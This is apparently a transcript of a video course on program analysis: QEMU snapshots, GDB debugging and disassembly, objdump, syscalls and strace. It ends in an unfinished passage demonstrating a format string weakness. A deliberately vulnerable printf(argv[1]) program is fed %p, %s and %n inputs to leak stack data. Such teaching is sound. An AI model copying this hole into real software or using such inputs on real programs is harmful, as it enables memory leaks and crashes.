3.12.1.qcow2. So this is the virtual machine I'm working with that is running Alpine Linux. So once it boots, we'll switch over to the QEMU monitor so that we can work with saving, loading, and deleting virtual machine states. Now I'll log in as root, and now we're at the command prompt. So I'll type Ctrl-Alt-2 to switch to QEMU monitor and run save VM, and it needs what we call a tag. I'm just going to call it my tag. So it's a tagged version, and now Ctrl-Alt-1 to go back to the virtual machine, and I'll do an ls, and there's a file in there called index.html. I'll delete this file, rm index.html, run ls again, and that file is gone. Now I'll switch back to the monitor, type load VM, my tag, and then switch back to the VM, type ls, and that file is back because we reverted to the previous state where that file still existed. Now if I switch one more time to the QEMU monitor and type del VM, my tag, that tag is gone. But the virtual machine is as it is now in the restored state. But if I type load VM, my tag, I get a device ID 0 does not have the requested snapshot my tag. So that tag does not exist. So we can make as many tags as we want, calling save VM and giving each tag a new name. So with save VM, load VM, and del VM, we can manage our tags. We can also back up those tags. If I type save VM of my tag, so I recreate my tag, that tag will always be there. So it's incredibly easy to save and load or restore a tag so that we can bring back a previous known good state or a reference point of our virtual machine so that we can work from. If we need to reproduce certain code, certain vulnerabilities or exploits, and we can revert back to the tag and start again. And that concludes this video on saving and loading virtual machine states in QEMU using QEMU Monitor. In this video, I'll demonstrate how to carry out some basic commands for a virtual machine in a staging environment using QEMU. I've just launched my QEMU virtual machine running Alpine Linux, and I'll press Ctrl-Alt-2 once I've logged in to bring up the QEMU monitor, and then we can run some of its commands. So I log in as root, and I'm at my terminal prompt. So Ctrl-Alt-2 to get to the QEMU monitor, typing help from the QEMU prompt gives us an impressive array of commands. Many that are quite special purpose and rarely used, at least for our purposes, but there are a few commands I'd consider essential, or at least ones that are good to know. I covered the commands for saving, loading, and deleting machine state in the video titled Saving Machine State, so in this video I'll cover some different ones, a few more. So I'll go back to the prompt, I'll scroll down through the commands, and the first one we're going to do is stop. So this stops or pauses the virtual machine. So I'll switch back to the virtual machine window, and if I type anything, nothing happens. So I go back to the monitor and type CONT for continue. Now going back to the virtual machine, I can type in a command, ls, and it carries it out. And at the bottom, the cursor is blinking, indicating that there is something going on. Another thing we can do is send individual keys to the VM. So I can send a key, say send key H, or send key Shift-H. That should send a capital H. I can also send combination send key Control CTRL Alt del if I wanted to send Control Alt Delete, which I won't do. So there's ways of sending individual keys or combinations of keys, especially using Control or Control Alt to carry out some action on the virtual machine. And if I go back to the virtual machine, at the prompt we have H and capital H, the two characters we sent from QEMU monitor. Another handy tool we can use is the screen dump command to take a screenshot. So if I type screen dump and then a file name, let's call it dump.ppm, because it's a ppm file, the type of image. And for this, I'll bring up a terminal window. I'll cd into documents where the virtual machine is running from, type ls, and there's a file called dump.ppm. And I can open this using xdg-open dump.ppm, and that will use whatever program is assigned to open those files from my current system. And it opens it in this image viewer, and this image, it's an actual image that's created using the dump. So this is a 1024 by 768 pixel image. That's 2.4 megabytes in size. So screen dump gives us a way of taking screenshots along the way so we can take a picture of whatever's happening. Now, if I go back to the monitor, I can also send commands like a reset to perform a system restart. So I could do system_reset, and that will reboot the virtual machine. And if I go back to the virtual machine, so it takes a moment, it boots, it powers down, and then starts up again. And if I go back to the monitor, I can actually carry a full power down by typing system_power down, all one word. And if I do a system power down, it will send a power off signal and carry out the shutdown. I might have to run it again because I sent it while it was booting and it may have missed the message. So it gets the signal to power off. And if I go back to my original terminal window where I ran my QEMU system x86-64 command, it's back to the terminal prompt because it's exited from the virtual machine. And that concludes this demonstration of the QEMU monitor and some of its basic commands. In this video, I'll present how to run GDB to step through and trace debug a C program. I'm assuming the tools are already installed, that you have GCC and GDB from the GNU compiler collection. Being able to compile and debug C programs are a bare minimum requirement for program analysis. I have Emacs open to view the code I'm working with, but you can use any editor, VI, or even an IDE, whatever you prefer to work with when working with C code. I'll guide you through the simple C example code I have. The important part is the debugging, but we need to know what we're looking at before we run it in GDB. So on line 1, I have #include, stdio in angle brackets, typical standard IO include from the C standard library. Then line 3, I have int g equals 2, semicolon. So we're setting a global variable called g equal to 2. On line 5, I declare a function int fun, so the name of the function is fun, and in parentheses, I declare the parameter int x. And then in the body of the function inside of the open and close braces, I have int y equals 4, and then return g times x times y. And now in the main function, int main void, so I'm not taking any arguments on. And in the body of this function on line 14, I declare int r equal to 2. On line 16, I call printf, and in double quotes, I have %d, an unsigned integer, and \n, the new line character, comma, then I call the function fun, with r passed as its argument. And then at the end of main, I return 0. So I'll switch over to my terminal window inside the same folder as this file, e.g. -02-03.c, and I'm going to compile it with gcc-g, which gives us our debugging information, so extra information that GDB can use, then e.g. -02-03.c, and then -o to output e.g. -02-03 with no extension. So e.g. -02-03 will be our binary. So now I'll type ls, and we have a new file that we can execute. Now if I type /eg -02-03, the program executes and prints the value 16 from our printf function. Usually when we compile a C program, we use a makefile, especially in a larger program with many files. And we use stricter warning and error conditions, WALL and WError flags. However, for this example, I'll stick to simpler options. Now I'll run GDB, and we specify the file command. So file and the name of the binary, e.g. -02-03, will load the program into GDB. And before I run it, I'd like to set a breakpoint. So I type break, e.g. -02-03.c, and then a line number. For this, I need to look back at the code in Emacs and think of a line I'd like to stop on. In this case, I'd like to stop on line 14, int r equals 2. So I'll just put 14 at the end of my GDB statement, and it puts the breakpoint in. I can also break on a function if I type break and the name of the function, so break fun. Now I'll run the code with run, and it starts the program and stops at my breakpoints. So the first one, line 14, int r equals 2, it stops and wants me to do something else. I can type continue, and it will continue executing, or I can type step, and it will step over the program. Now, using step, it steps into function calls. So when I get to line 16, my printf, and I run step, it will step into the function fun. But if I use the next command, it will execute the line on the current function, but it won't follow into functions any deeper. It will just execute the line of code and continue one by one. Now, instead of typing step every time I'd like to run a command or run a line of code, I just type enter, and it will execute the last command, in this case step. So in this case, it reaches the second breakpoint, the function fun, and each enter will step over the next command. So int y equals 4, return g times x times y, and it gets back into my main function. It will step into the printf function after fun returns. But I don't want to do that. I don't want to enter that subroutine. So I'll type next. And then it gets to the last line, return 0. If I'd like to inspect any variables, I can use the print function. So print r gives me 2. But instead of typing print every time, I can just type p space r, and it will also print. So many of the commands require 1 or 2 letter or small letter codes that give you a shorthand to run some of the GDB commands. I can also print a memory location, a memory address using print/x. And in this case, let's do print/x, which will give me a hexadecimal value. If I do print/x of r, it gives me 0x2. But if I print/x of %r, it gives me the hexadecimal memory address. If I type the function where, it shows me what function I'm currently in. If I type bt, it gives me a backtrace. So if I'm in a function, it'll show the function call stack. If I type finish, it will complete the current function or subroutine. So in this case, I'm in main, and if I run finish, it tells me it's not meaningful in the outermost frame. For that, I need to do continue. And it shows me that the process exited normally, so the program has completed. So now if I type print R, it won't have any meaning because the program has completed and it's no longer in memory. It's no longer in context. If I type info breakpoints, it shows me the breakpoints that I have set. If I type I space B, it shows the same thing. I is shorthand for info and B shorthand for breakpoints. I'd like to delete a breakpoint. I can type delete or just D and the breakpoint number, D1. And now if I type IB, it shows me I only have one breakpoint left, the one at the function fun. Now I'll type run again to run the program, and it stops at that breakpoint, fun. There's also other info commands. So ireg gives me the state of the registers at this point. iframe gives me the stack frame information, and where shows me where I am in the call stack, and it even shows the line numbers. So fun was called on main on line 16, and fun in the function fun at line 6 currently. And that concludes this presentation on running GDB. In this video, I'll demonstrate how to run GDB to disassemble a program into its assembly code. One of the key features of GDB is to take a compiled program and debug it line by line. But it can also display the compiled assembly instructions of a program as well, called the disassembly. So I have opened the example code I'm going to use in this demo. I start on line 1 declaring a global variable called g, and I define it with int g equals 2. Then I have my int main, and in the body of main, on line 5, I have int r equals 2, then r equals r times g, and return 1. So it's a simple program that doesn't do very much, but it should give us a few instructions in GDB that we can look at in its disassembled form. I'll switch over to a terminal window, and in my current folder, I'm going to compile the program. So gcc -g for the debug symbols, eg -02-04.c -o eg -02-04. This compiles our program, and if I type ls, we see that the program is there, and typing /eg -02-04, it runs the program, but there's no output in this program. Before I run GDB and demonstrate the disassembly, I've configured an option for GDB to change one of the defaults. So I'll type cat ~.gdb init. And in this file, we set some initial values, some defaults we'd like to use or change for when we run GDB. I'll hit enter. And in this file, I have set disassembly-flavor Intel. So there are two disassemblies. So the assembly output of the disassembly is either in the Intel syntax or the AT&T syntax. Now I'm more comfortable with Intel syntax. That's what I'm familiar with. So I set the flavor to Intel as my default. But I'll demonstrate the AT&T syntax as well once we get into GDB. So I'll type GDB eg -02-04. So I have the file loaded. I'll run it in GDB just to test it to make sure it runs, and it exits with code 01. So I return 1 at the end of the program, so that's expected. Now I'll type disassemble disassemble space main. So we're going to disassemble the main function into its assembly output. And what we see here corresponds to the C code I had written. And if we look at one of the instructions, like on the line with move MOV EAX, 0x1, so this is going to be our return value. We're putting the value 1 into the register EAX. So the format is the instruction MOV, the destination EAX, the source, or the value. So the first line of our dump of assembler code is the end BR64, so to terminate an indirect branch in 64-bit mode. Then we push our RBP, So we're preserving our previous values. Move RSP into RBP, so RBP, RSP. Then move dword PTR, so it's a dword pointer, and in square brackets, RBP minus 0x4. So this corresponds to our local stack variable from our code, which we set to 2, so 0x2. So this is our variable R. And then into EAX, we have move EAX, dword PTR, and in square brackets, RIP plus 0x2 ED2, which corresponds to our global variable G. So we put that value into the EAX register. Then we put the value of our R variable, the 2, from RBP minus 0x4 into EDX. Then we do an IMUL of EAX, EDX. So it's taking the product of the two registers and keeping them in the EAX register. Then there's a move of dword PTR, RBP minus 0x4, which corresponds to our variable R, and it's storing the result from the EAX register. Then we move EAX, 01, so putting 1 into the EAX, popping our RBP, and then calling ret to return from main with the return code that's in EAX, or 1. If I set disassembly -flavor ATT, or set disassembly -flavor ATT, and then run disassemble. Now, instead of writing disassemble main, I can just type dis as, so disas, short for disassemble main. It does the same thing. And now it's in the AT&T syntax. So if we look at one of the lines, so at +30, we have MOV $0x1, %EAX. So that's putting 1 into the EAX register. It's the order of the operands are reversed, and there's the % and $, prefixes on values or registers. And that concludes this demonstration of disassembling a program in GDB. In this video, I'll demonstrate how to run object dump, objdump, and readelf to disassemble and inspect a Linux program. We'll take a compiled program and read its program structure, its text, data, and other segments, and get information on hexadecimal address offsets. The code I'm using is about as simple as it gets. In my current folder, if I type cat eg-02-05.c, the text file that contains the code, all it has is a single line, all condensed with a main function, declared int main, with open and close parentheses, so no arguments, open and close braces with a return 0 semicolon in between. This allows us to examine what GCC adds to the ELF binary output and see the scaffolding around it. I'll type GCC eg-02-05.c -o, and the output binary will be eg-02-05. Now I type ls, or ls-la to get the results, and the C file itself is only 25 bytes in size, but the output is 16,464. Now there's a certain amount of padding in there, but there's also a number of sections that get added to it. I can also verify that the program runs by running /eg-02-05, and of course nothing gets printed because all the program does is return 0, returns success. Now let's do an object dump. So obj dump -x, and then the name of the file, eg-02-05. So this will show pretty much everything. So if I scroll up to the very top of the output, I scroll up through quite a lot. And the first part, the first line, it gives me the file format. It's an ELF64-x86-64. So it's a 64-bit Intel or AMD binary in ELF format. Gives me the architecture, the flags, has sims, dynamic, depaged, so some flags about how it's built, the structure of the ELF binary, the start address, and then the program headers and the different types of headers. So we have program header, and then we have the program header. And it gives us an offset, virtual address, and how it's aligned. It gives where it's offset in the file, in memory, and the flags. Now, the flags are very important, as well as the offsets, so we can know where each section is, each header section, as well as the attributes, whether it's read, read-write, read-execute. We have a bunch of load sections. The important one here is the load at hexadecimal 1000. And if we look at the flags for this one, the flags are read, execute. This is actually the program start. It loads the text section, the program text, our code at this location. And there are a number of other sections that get added. So it links in, so dynamic section needed, libc.so.6. So it actually loads in the libc, in this case, the glibc, and a bunch of information that comes along with it. And it gives us the version information, some more information about libc, version 2.2.5, so glibc underscore 2.2.5. And then we get to the sections. And here there are a number of small sections that get added by GCC, and the really important ones, the RO data. Now we'll either have a data or RO data in our program. So RO for read-only. So this is the static data in the program. We get the dynamic, then data, the BSS, and comment, plus of many others that get added, including initialization, init array, finish array, text, of course, the program text. So all of this gets added. And again, it gives us some flags, load, read-only data, read-only code. So these are all important bits of information that we should have available when we're looking to analyze programs. Now I'll scroll down again. This is a symbol table. Now there's a lot of information that gets added, even with the most basic C program. You'll see in the video titled Syscalls with Assembly that in an assembly program where we perform much less, a minimal assembly program doesn't give us all this extra information. Most of this has to do with GCC and glibc. But what about the code? What can we do with object dump in that case? I can type obj dump -sj, then eg-02-05. Actually, I don't need a J option in this one. Let me try that again. -s eg-02-05. So S gives me each section disassembled. And this is a nice view of it because if we look at our data sections or the RO data sections, we'll see any static variables declared. Any other information about linkages like libc and how any dependencies or any files, shared objects are linked into the program, these get displayed when we run object dump -s. Now the next one I'd like to do is obj dump -M intel. So this is going to give us output, disassembled output, using the Intel syntax. Now there's two syntaxes available, the Intel and the AT&T. I grew up with Intel syntax, so that's what I'm used to. So I usually, whether I'm using GDB or object dump or some other disassembly, or if I'm running assembly code, I usually use Intel syntax. And then -d eg-02-05. And here it gives the disassembly with all of the code sections. Now there's much more here than what we'd expect, but the important one is the main function. And inside of main, we get the disassembly of the main function itself. So this is based on the code that we wrote, and everything else gets added by GCC. So here we get the NBR64, which is terminate the indirect branch in 64-bit mode. So this avoids any indirect jumps. And then we push the RBP. So we push our RBP and then move our current RSP into RBP and then move 0 into EAX, pop our RBP and return. So EAX contains a return value 0 and we get our return and then a no-op, and that's the end of our program. So it's incredibly simple. There's only really 2 lines of code that do anything, which is the move EAX, 0 and the ret. That corresponds to what's actually in our program. Everything else is added by the compiler. So there are two more commands I'd like to show. One is hex dump, and we could do just a raw hex dump of our binary if we need to look at the individual pieces. Now, if we scroll up and find out the offset, such as the 1000, where the program begins, we could actually find our moves, the actual mnemonic instructions tied to our hexadecimal values in the binary. As well, we can do a readelf -h, and this will give the header information of our EG-02-05. So it's just the ELF header information. And that gives information about the machine it was compiled for, the type, the version, the entry point address, the OS, the ABI compatibility, the class ELF64. So it's good to know whether it's a 64-bit or a 32-bit ELF. Again, these are all things you can get readily available, and it makes it much easier when analyzing programs than to try and fiddle around and find out where everything is. And that concludes this demonstration of dumping objects. In this video, I'll demonstrate how to interface with the Linux kernel through system calls in C. Interfacing with system calls is done through the UniSTD library. This is not a standard C library. The methods we are calling are a direct translation to the syscall. After I explain this short piece of code, I'll debug it and we can disassemble it to see the actual system calls. So on line 1 of this example code, I include unistd.h. This contains all of the mappings, all of the definitions for our system calls to their numeric IDs. So the functions we call from this library call the system calls directly. Then on line 3, I have int main and its parameters int argc, char star argv, double brackets. And then in the body of the main function on line 5, I have char star str equals the string in double quotes, hello, world, !, \n. So these are 14 characters, including the comma, the space, the exclamation mark, and the new line character. So on line 6, I have int str_len equals 14. Then on line 8, I call the system call write function, so just write 1, str, str_len as its arguments. And then on line 10, I call _exit of 0. So we return from main with a status code of 0 for success. Now I'll switch to the terminal window, and in my current folder, I have the C file, which I'm going to call GCC with, so GCC -g for debug information, EG-02-09.c, -o, EG-02-09. So we compile the program. I'll do a /EG-02-09 to run the code to make sure it works. I get the result hello world printed to the terminal window. And now I'll run GDB. I'll use file to open up the program. So file of EG-02-09. I'll put a breakpoint in main, so break main. And I'll disassemble main with DISAS of main, and we get all of the assembly code. So most of the assembly code is setting up the variables until we get to the last few lines. So at +55 in the disassembled code, we have call 0x1070, and in angle brackets, we see write at PLT. So this calls our write function from UniSTD, which is a system call. And at the end, to exit, we call 0x1060 and in angle brackets _exit at PLT. So everything happening to get hello world to output to the screen is performed in this main function. Now I'll just run the code from the disassembler. It breaks at main. And if I type NI, it'll actually cycle through the next instruction in assembly. So we can see these instructions go line by line. Now with assembly instructions, a single C instruction might take multiple instructions to be performed. So running NI for each instruction actually takes a number of steps, but we can step through it in a very granular way. Now I'll quit out of GDB, There's a couple of other functions that are important once we have our result. I can use objdump -sj and then specify a section, in this case RO data, of eg-02-09. And the RO data is the read-only data section. So hello world gets put into this section when the program is compiled. And we see the address it's at 2000, and we see all of the bytes that make up the string hello world. I can even look at the assembly code if I do objdump -M intel. I need to specify this option if I want to see the result, the assembly result in the Intel syntax rather than AT&T, then -dj.text, and then eg-02-09. And I get all of the assembly code or all of the disassembly from the program. And in this case, there is a lot of code. There's a lot of extra code around it that's put in by GCC. But the important function is main. And this is identical to what I had in GDB when I did the disassembly. So the main function using objdump is the same and should be the same as the disassemble main I get when I'm running GDB. And that appears to be the case. And one more command that's handy to use is strace. If I type strace in /eg-02-09, this will give me a complete trace of all of the system calls that are made when we run this program. And there's a lot more happening here than the ones that we invoke. There's nmaps, there's preads, fstat, openat, close. There's a execve, brk. So there's a lot of commands that get run up until we actually get to the end of these calls, where we see the syscalls, the write and the exit, in this case exit_group, the actual calls that are invoked by our program. So we can't just take the code at face value, the code that we write, because when we compile, the compiler and the linker will put in more information, more scaffolding and support material, more system calls to set up our program before executing it. So a lot of this gets abstracted away, which is a good thing for the developer. Knowing everything that's happening under the hood is very important. And that concludes this demonstration of performing syscalls from C. In this video, I'll demonstrate how to interface with the Linux kernel through system calls performed in assembly. So I have some assembly code loaded here, and I'll compile it with NASM from the command line in a moment. So for this video, it requires we have NASM installed. On line 1, I declare section.txt. So this is our program code. On line 3, I declare global_start. And then on line 4, I define my entry point to this program, _start:, and then on line 5, I have MOV, so move RAX, 1. So this puts the system call number 1 into the RAX register required by the system call. So this is to perform a write. But what are we writing to? Well, we have to tell syscall that as well. So I do MOV RDI, 1, which says we want to write to the standard out, std out. We also need to pass in the bytes we're going to write and the length. So MOV RSI, greeting. Greeting is defined in the data section as the string hello world, and MOV RDX, len, the length of the string. And then on line 9, I perform the syscall. On line 11, I have MOV RAX, 0x3c, which is the syscall number for exit. And then line 12, I put the exit code, MOV RDI, 0 for success. And then I perform the syscall. On line 15, I have section.data, so I declare my data section where I'm going to define my variables. On line 17, I have greeting, db, for defined bytes, and in single quotes, I have hello, space world, ! End quote, 0xa, so we have another byte, which is the byte defining the new line character, 0 to null terminate the string. Then on line 18, I have len, EQU, $-greeting. So this takes greeting and calculates len, and this is done at compile time, not at runtime. So this is a constant being declared. So it will put the greeting, the length of hello world, in the len variable, which gets put into the RDX. So I'll switch over to my terminal window, run nasm -f elf 64, so elf64, that's the format, so it's a 64-bit elf, -o, e.g. -02-10.o. So it's going to compile an object file. And then e.g. -02-10.asm is our source code. So I mistakenly put hash symbols instead of semicolons for my comments. And so I'll put those comments in, resave the file, and recompile it. And then it compiles successfully. That's what I get for putting in comments at the last minute before recording and not recompiling the code to make sure I didn't mess anything up. So now, after we've created the object file, I do ld, so I run the linker -o, e.g. 0210, so that's our output, e.g. -0210.o, our input, and the GNU linker gives us an executable. So if I type ls, I see that I have e.g. -02-10, an executable in this folder, which I will run now with /eg -02-10. And we get the result, hello world. Let's have a look at some of its assembly. We can do that using objdump, and I'll use -sj.data on eg -02-10. And this gives us the data section. So we can see where hello world is defined in the data section of this binary. And objdump -M intel -dj.text of eg -02-10. So we'll see the disassembled code from the text section in Intel assembly. And it gives us almost exactly what we put in our code. So I have the moves into EAX and EDI. So it's actually showing the 32-bit prefix on the registers. So the E instead of the R, but it's performing the same thing. So move 1 into EAX, 1 into EDI, and then move ABS, move absolute RSI, 0x40200 is the same thing of our data section where our hello world text appears. So that corresponds, that address corresponds to where the hello world data is. And then it moves 0xf into EDX, which is the calculated value of len. So that's the number of characters in our hello world string. So it calculates it and puts it in as a numeric value. Then the syscall, then move into EAX 0x3c into EDI 0, and then syscall, and the program ends. I can also run it with strace /eg -02-10, and it's executed with 2 system calls, write and exit. Unlike a C program compiled with GCC, which has a number of other objects linked into it, such as the glibc standard library, the assembly executable doesn't have all of that scaffolding around it. So if you compare this to what the result was in syscalls with C, they are very different. And that concludes this demonstration of syscalls with assembly. In this video, I'll demonstrate how to query system calls available in your installed version of Linux. The available system calls are documented in the manual page of section 2. So if I type man _2 intro, so this is an introduction to system calls, with section 2 of the manual describing the Linux system calls. Now, if I want to see what other man pages are there or what system calls are available or documented on the system, I'll have a look with ls/usr/share/man/man2. So in this folder are all of the system calls available. But I don't want to have to scroll through and read all of these system calls. We can clean this up a little bit. And it's quite handy to be able to do this. If I do ls of /user/share/man/man2, and I pipe that into sed, so we're piping the text of the result of the directory listening, and we're going to substitute, so -es/.2.gz// is we're just going to remove this text, g, we run it again, we get a complete list without the extension, so we have a list, and because ls puts it in sorted order, we have a sorted list of all of the syscalls, but we just have the names. So we have the names of the methods, and we can get a description of all these if we take our previous command. So after sed, we pipe that into xargs, and we run man-s space 2, so section 2 -k, which will give us the description. So we get the list of all of the names, all of the system calls, and a description of what those system calls do. And we can type man and go into any one of these system calls and get a complete description. If I type man of uname, it gives me the uname command. So the print system information, man of write. We actually have to specify the number. So man 2, so section 2 is write, and not whatever section comes up by default. This is write to a file descriptor, and it gives us the declaration of the function. So ssize_t write into fd, the file descriptor, const void buff, the buffer we're going to write, and the size t count. So I can check other ones, man to uname. It returns some information about the system get name and information about the current kernel. So we have descriptions, manual pages for all of the Linux syscalls on our system in section 2. But what about the numeric IDs, the system call table numbers? Where can we get those? Well, we can get them from the unistd.h header. But there are a few variants of that. If I do find/usr/include -name, and in double quotes I put unistd star, and then close the double quotes, there's a number of these files. So the important ones where we get the numeric IDs is in the unistd_64.h inside the ASM folder. So I'll do a cat of /usr/include x86_linux-gnu/ASM/unistd_64.h. And here we have defined all of the syscall numbers. And it goes all the way up to 435. So there are 435 different syscalls in my current version of Linux. And if I scroll all the way to the top, I see the main ones at the first, the ones I've done in other videos, such as the write, so write 1. And if I scroll down to 60, I believe, 03x in hexadecimal is the exit. So at number 60. And that concludes this demonstration of looking up implemented system calls. In this video, I'll analyze a simple Linux program's system calls using strace. In the video titled Syscalls with C, I used the strace command to display the system calls it executed. I didn't go into details about the full list of syscalls that were executed, but I'll expand on it now. When GCC builds a program and brings in or links different libraries, it brings in more information. And there's more housekeeping and scaffolding that goes around a Linux program than you might expect. But we'll look into why that is now. So I have this program here from syscalls with C, and if I run /eg-02-09, it's just a simple hello world program. And if I do a cat to output the contents of eg-02-09.c, we have a very simple C program that does a hello world with the write and exit syscalls. So we expect those syscalls to be there. So if I do strace on /eg-02-09, I get the entire list of syscalls that program generates. And the last two of them are the write and exit. But everything else are things inserted for us that weren't explicitly programmed. I'll scroll up to the top of this list and we'll see what's happening. The first syscall is execve. When a program is run in Linux, a process is created and forked, and execve runs it. Its parameters are basically the ones passed to the main function in a C program: the program's name, the arguments, and the local environment. So here, /eg-02-09, and the list of arguments, which includes the program name, and then the variables or a pointer to the variables. In this case, it just shows 50 vars, so there are 50 environment variables passed into it. There's an =0 at the end saying it's successful. Then brk with argument null. So these first two ones appear on almost every Linux program. brk sets out our heap. It returns a pointer to the start of the heap, and in a C program, we typically start allocating from this point, allocating on our heap with malloc. Then arch prctl. So this sets the architecture-specific thread state, and 0x3001 is a status command. This will show -1 or returns -1 e in val. It returns this because this feature is not supported, but it's not something we need to worry about. Then we call access. It checks the access permission on the ld.so.preload and checks for ROK. So this is a basic file existence check, but there is no such file, so it returns -1. Then openat @_fdcwd, comma, and then in double quotes /etc/ld.so.cache, comma, o rd only, pipe o clo exec. So read only, close on exit, and it returns a file descriptor. So we have an open file, 3, and it's our ld.so.cache. So this checks the ld.so.cache for anything, calls fstat, so this gets the file mode attributes, the size of the file, and we can use the size on Nmap, the next line, to map the file into memory using the amount returned from fstat, in this case 77906. We set the read flag, so it's a read area, it's private to our thread. The file descriptor is 3, and it returns the memory address for us. So once we have it mapped in memory, we can close the file. So we call close of 3, the file descriptor. And that was returned by openat. And now we open another file, our libc file. So openat @_fdcwd, comma, then in quotations we have /lib/x86_64-linux-gnu/libc.so.6, comma, we open it read-only, close on exec, and this returns file descriptor 3 for this one. So it reuses the file descriptor, and then we read the header of the file. So read of file descriptor 3, and the string shows the text from the elf, \177elf. So we read the elf header, and then we read some more information using pread64, so this gets read. All of this information being read, this is just header information from the file and some basic information to get us started. At this point, when everything checks out, fstat is called with file descriptor 3, and then mmap to map the file into memory. We call pread again. So it's 3 lines of pread64. And now we're getting to some of the more important parts of the code, areas where we'll start to see some things we know. Even if they aren't spelled out explicitly, we can kind of figure it out based on what we know about the memory segments that we work with in a typical Linux program. So we call mmap to set aside some memory. So we have the size, the mode, read, map private, map deny write, so it's not writable, and it returns an address. Then mprotect is called on a portion of this memory. So we'll have an address. We'll see the last few bytes is CA3000. So we initialize it to none, so there are no attributes. So it's a non-readable section. But then we call Nmap at CA300. We set 1540096 bytes aside. And then we set the flags prod_read, pipe, prod_exec. And this also returns the address. Then we have another offset, another address. So Nmap on another location, this is set to prod_read. And then another Nmap in another nearby location, it's read-write. Then we close 3. We close the libc shared object. We set the arch PRCTL, the architecture specific thread state, for the 64-bit FS register. And this returns successfully this time. And then we finish off by calling mprotect on 3 locations to prod_read. So we want to make these areas readable, and these are just setting up certain memory segments. And you'll see many of these addresses are in the 0x7F8413 range. All of the Nmaps called above were in that range, the previous mprotect. And then we have 2 of them of these 3 in that range, but one is in the 0x555C08553C000. And this came up earlier on the second system call, the BRK. That's the address that was returned, or an address that's in that range or very close to it. So we're protecting an area of the heap in this case making them readable. And if these protections are violated, then there'll be a SIG-SEG or segmentation fault because of this. Then we call munmap. So we're unmapping that region or freeing that memory because we no longer need it. And then it finishes off with a write of hello world, and it exits out. And it exits cleanly in this case with exit code 0. So most of this is then just setting up the memory segments, the BSS, the data, and the text. And only the last 2 syscalls in this case come from the C code to carry out the hello world and exit. And that concludes this demonstration of analyzing simple Linux programs using strace. In this video, I'll explore the space allocated for text, data, and BSS segments of a Linux program. I'll explore how the amounts change based on how variables are declared in a simple C program. So I have my simple C program open here in Emacs, and I'll go through it now. So on line 1, I have #include of stdio.h, and then on line 3, I declare a global variable g using int g. Then I declare my main function, int main, with argc and argv, as typical in C programs, and then in the body of my main function, on line 7, I declare static int s, char c, int a equals 10, double b equals 3.14159, and char star t equals null. Then I do a printf of the string hello world and return 0. So it's a very simple C program with some variables declared that will either be put into the data or BSS segments, with our code being put into the text segment. So I'll switch over to my terminal window. I'll compile the program with gcc eg-02-14.c-o eg-02-14. And I'll do /eg-02-14 to run the program, make sure it works so it prints hello world. And now I can run the size function. So size of eg-02-14 gives me the size of the text, data, and BSS segments, as well as the decimal sum of the 3 segments and the hexadecimal sum, so the sum in hexadecimal form for the 3 segments, as well as the file name. Now I'll switch back to Emacs. I'm going to change int g on line 3 to be int g equals 1. I'll resave the program, tab back over to my terminal window, arrow up a few times to run gcc again. Then I'll run size on the program, the recompiled program, with the change. And in this case, the data segment has gone up by 4 bytes and the BSS segment down by 4. So it moved the variable from BSS to data. And of course, this is because the BSS contains uninitialized data and the data segment contains the initialized data. Now, if I go back into my program on line 7, if I change it from static int s to int s, resave it, then I'll arrow up a few times in my terminal window to run GCC again, and then check the size on EG-02-14 again. And this has taken 8 bytes out of BSS and decreased our program size. So that one was particularly interesting. Now, if I change int s, if I go down in my program and I move our printf down a few lines, and on line 13, I'm going to insert s equals 5, and I'll save the program. I'll go back to my terminal window, recompile, and run size again. And this time, I've gained 16 bytes in the text segment in the code, but the BSS segment is still 4. So minor changes the various segments in different ways based on whether I declare a variable that's initialized or uninitialized, or whether I set a variable in code where it gets put into the text segment or section. So global variables, especially global variables that are uninitialized, if I put another one in, int t on line 4, when I don't initialize it, I'll run GCC again and run size. It puts another 8 bytes back into the BSS. So I thought it'd be interesting to go through the 3 segments, the BSS, the data, and the text segments of an actual program, and just demonstrate how the sections change based on how variables are declared within the program. And that concludes this video on exploring program segments. In this video, I'll describe a common weakness found in the printf family of functions. These aren't as problematic as they used to be for the most part. The problem I'm going to describe here will crash a program, cause a seg fault. However, they're not as exploitable as they used to be. But because of past vulnerabilities, these are now flagged by our compilers, and protections have been built into the kernel to make it very hard to carry out this exploit. But they have been the source of many weaknesses and exploits in the past. I'll describe this simple program, which may look harmless enough on the surface, but once we get into it, you'll see why this is a very big problem. So on line 1 of this C code, I have include standard IO stdio.h. And then on line 3, I have int main with the usual parameters int argc, char star argv, double brackets. Then in the braces defining the body of the function, I have int a, which I'm not going to use at the moment, but I'll make a modification where I will use it. And then on line 7, I do a printf, and in parentheses, I have argv indexed at 1, and then I return 0. So there's only really one line of code that does anything, printf function. So I'll switch over to the terminal window, and I'll run GCC on this code eg-03-03.c. And it does compile. If I do ls, we have a.out in the current folder, so it compiled, but it gives me a warning. Format not a string literal and no format arguments. Printf, and it highlights it. Well, it's because the first argument to printf is a format argument. So we have special characters, which I mentioned in the previous video exploiting strings. So I'll run the program ./a.out, and I'll give it an argument. Now this argument is going to contain a space, so I need to put it in double quotes. And I'm just going to pass hello, comma, space, world, exclamation mark, and then I'll close my double quotes. And it prints the string hello world. So that was fine. It did what we expected. But in a formatted string, a format argument for printout, we have formatting. I can put special characters in. I can put \n for new line characters. I can put %p for a pointer address. But where's that going to come from? I can put as many as I'd like. I can put %s for a string, and I'll put another \n at the end. I'll close my quote and hit enter. Now the \n didn't get translated, but the %p and the %s did. So when we think about this formatting, there's some strange things happening here. Where's it getting those values? So there's a 0x7ffdf, 1a71fd8, and then a comma, $, and then some weird question marks for some strange characters, and then another \n. So it didn't parse the new line character, but the %p and the %s got substituted with something. What did it get substituted with? Well, what printf expects after a formatted string are variables, a variable argument list of our args with variables to put into those parameters, to put into the %p, to substitute into %p and %s. But printf, what it does is expect those variables to be on the stack. And it just starts popping variables. And if there's nothing there, then it just grabs whatever's on the stack at that point. And it'll grab things that you wouldn't expect. Values from other variables, random locations in memory. And if I do ./a.out again, and in double quotes, I'll put %p. I'll put a whole bunch of %ps. I'll put, let's say 6 of them. And it gives me many more addresses, including a nil, which is probably a null value, in parentheses. So it's pulling these values from somewhere. Let's go back to the code and see what else we can do with this. I'm going to modify line 7, put a comma after the argv1 argument, the format, and put %a. So that's the address at A. And I'm going to put some space after that and put a printf in at line 9. And I'll put a new line character, %d for an unsigned integer, and another new line character, close the quote, and put the value A. So we'll see what A contains after this. Now, if I just run the program, after I compile it again, and I put in 1, well, argv has 1, but A contains 32767. Let's change it. Let's do ./a.out, and I'll put in some characters. Let's say A, B, C, D, E, F inside of a string, and then %n. And then I'll close 